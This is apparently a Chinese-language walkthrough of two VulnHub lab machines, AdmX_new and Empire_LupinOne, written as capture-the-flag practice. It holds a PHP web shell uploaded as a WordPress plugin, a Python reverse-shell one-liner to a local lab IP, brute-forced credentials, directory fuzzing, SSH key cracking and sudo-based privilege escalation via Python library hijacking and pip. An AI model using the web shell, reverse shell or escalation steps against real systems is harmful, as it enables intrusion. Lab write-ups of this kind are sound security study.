Vuln AdmX_new & Empire_LupinOne

AdmX_new

靶场链接

https://download.vulnhub.com/admx/AdmX_new.7z

日常扫描

只有80端口开放，直接访问没什么东西，dirb扫描出来wordpress，访问看看，发现很慢，burp抓包发现重定向到192.168.159.145

getshell

wordpress的后台登陆在wp-login.php,爆破账号密码得到admin/adam14,进入后台第一时间想着图片马传上去，然后蚁剑连接，结果一直失败，后面发现可以传插件，打包成zip传上去

1
2
3
4
5
6
7

<?php
if(isset($_GET['cmd']))
        {
                system($_GET['cmd']);
        }

?>

尝试访问http://192.168.64.9/wordpress/wp-content/plugins/wordpress_getshell.php?cmd=id 哎，可以执行，尝试python反弹shell

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.64.3”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")’

提权

成功之后sudo -l看看文件执行权限，发现 直接执行这个， 成功拿到root

Empire_LupinOne

靶场链接

https://www.vulnhub.com/entry/empire-lupinone,750/

扫描

访问80端口看看 一个图片，源码里面也什么都没有 dirb直接扫目录啥都没有，robots.txt里面有一个 但是访问这个页面又是一个404,在旧版本的Apache服务器中，~ 指代用户主目录，可以用fuzz进行测试

wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt –hc 403,404 http://192.168.64.15/~FUZZ

扫描出来secret页面， 大概发现是有个账号，还缺一个密码，在这个下面继续探测

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –hc 404,403 -u http://192.168.64.15/~secret/.FUZZ.txt

发现.mysecret.txt，访问一下

getshell

估计就是ssh的密钥，不过被简单的加密了，扔厨子里面，base58直接出来 返回kali，vim一个sshkey，扔进去，然后用join暴力破解

/usr/share/john/ssh2john.py sshkey > hash john –wordlist=/usr/share/wordlists/fasttrack.txt hash

得到密码P@55w0rd!

提权

sudo -l看看 大概是自己写了个python库，然后这个python文件可以执行他，而且是另一个号的权限，那么就可以通过这个提权，

find /usr/ -name ‘webbrowser’ /usr/lib/python3.9/webbrowser.py

往里面写一个binsh试试（这个靶机怎么vim都没有啊啊） 执行之后确实提升权限了，但是还不是root，再来sudo -l一下，发现可以执行pip，直接pip提权 这个时候就结束了